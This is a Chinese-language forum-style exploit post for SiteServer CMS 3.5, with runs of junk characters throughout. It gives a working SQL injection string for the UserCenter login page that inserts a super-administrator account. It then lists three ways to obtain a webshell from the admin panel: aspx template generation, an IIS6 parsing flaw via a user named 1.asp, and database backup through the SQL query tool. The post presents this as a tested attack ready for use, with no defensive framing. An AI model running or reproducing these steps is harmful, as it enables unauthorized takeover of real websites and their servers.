经测试秒杀最新的3.5版
& }) C* q' x, A: C. F/ b g' |0 T# K+ z& P( U. C, Q6 L
stieserver官网:www.siteserver.cn
9 {/ t' T2 h0 i8 o+ F/ ^
& l4 O' Q+ X6 M M4 { 0 c& {$ @+ X$ |/ x. E% Q- @
3 x* V9 D4 V& e. N% GEXP:
% P- {& _+ {' T( v) n; s
8 Z% r3 X- w3 w直接访问UserCenter/login.aspx$ I/ j1 z, l' h3 \! t7 |4 @/ Y
$ K I+ Q& {$ V 3 r' U5 y0 L/ n' G& J3 e
0 j2 f+ R- H6 c4 u( u3 q! r) t
用户名处输入:6 N ]7 N# K! L; l7 x8 u1 r
, Q7 a8 {" l R+ h8 Z; ?123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--/ Q( I3 t3 U* e" U: x7 E
6 Y8 t5 f" P. ^! F8 V
4 k, j8 e$ L& V! @' y
% o W& l! Q' K/ M1 S密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
. x# ^5 g. f: `4 V% g; ^2 z7 F( r! B# N% L& p! L
( W& V+ m, g/ { A6 S) o
: F4 x k, q+ L5 T之后再访问后台SiteServer/login.aspx用插入的用户登陆
1 C. \ D! G0 c- _# C" g4 N& x: ^; B& n
* O/ y5 R6 r+ ^) [2 T - a* k" R; X; C; J
. t' P" X: o- H, ^2 r# @& N
后台拿webshell的三种方法:
2 _2 y: q* ^) Q: i" X9 F
9 r% r6 T, V2 x' d P: N一、
# a7 p9 y; {* ]1 c1 l) B$ b5 G* P# }
9 u6 s) f3 R9 i+ `9 @) ]站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx4 H9 w. i& F* D
6 E3 I2 q8 O) I. x, k3 v二、5 b% M1 J4 o) @/ I+ @0 e+ }
( {3 h# [! e, `
成员权限-》添加用户-》用户名为:1.asp
, R1 q3 b- ]/ T+ O
; ?( B2 n: K- n. h5 A% Ohttp://127.0.0.1/usercenter/
5 u3 ~' p; Z% c
4 B9 `- c, O) ] b7 d3 [( R用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell- m* [" o+ P. e, i, {8 M' [
# p) L |5 q' |. a
(ps:后台添加用户时不会验证是否含有非法字符)+ z( ]0 H8 B6 p- f' y5 [4 Q
2 S& O: B( N2 `2 w1 u
三、
# n8 j: \, f$ \1 V4 q: R) M) X
/ _8 c1 ?2 i6 O% B- b$ Y系统工具-》实用工具-》机器参数查看8 a y i, ?" `+ s; R
可以看到数据库类型、名称,WEB路径
& x$ s4 H) m+ S8 i2 Q* ], h' ]' G: B
系统工具-》数据库工具-》SQL语句查询
: U. p# l8 {1 ?. k) o这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。$ n1 Q( `9 ]5 s: o% G
/ ^* _$ k# a6 o! u |